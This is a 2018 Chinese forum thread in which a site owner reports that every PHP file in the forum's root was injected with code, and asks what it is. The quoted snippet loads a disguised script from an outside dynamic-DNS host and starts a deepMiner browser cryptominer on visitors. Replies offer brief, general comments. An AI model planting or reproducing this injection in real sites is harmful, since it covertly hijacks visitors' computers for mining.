本帖最后由 图样图森破 于 2018-1-26 10:11 编辑


今天打开自己的一个论坛，杀毒软件马上报警，

经检查，发现论坛根目录下的PHP文件全部被插入下面这段代码：


echo "<script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script>
        <script>
            var uri = 'www';
            var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
            if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
            jqueryui.start();
            }
        </script>";



求大神分析，这是啥东东？如何预防再次被挂马？

无法预防，因为你压根都不知道别人从哪里进来的

对方应该没有拿到管理员权限

谢谢大佬指点，之前从未做过安全设置，没想到没什么流量的网站也会被盯上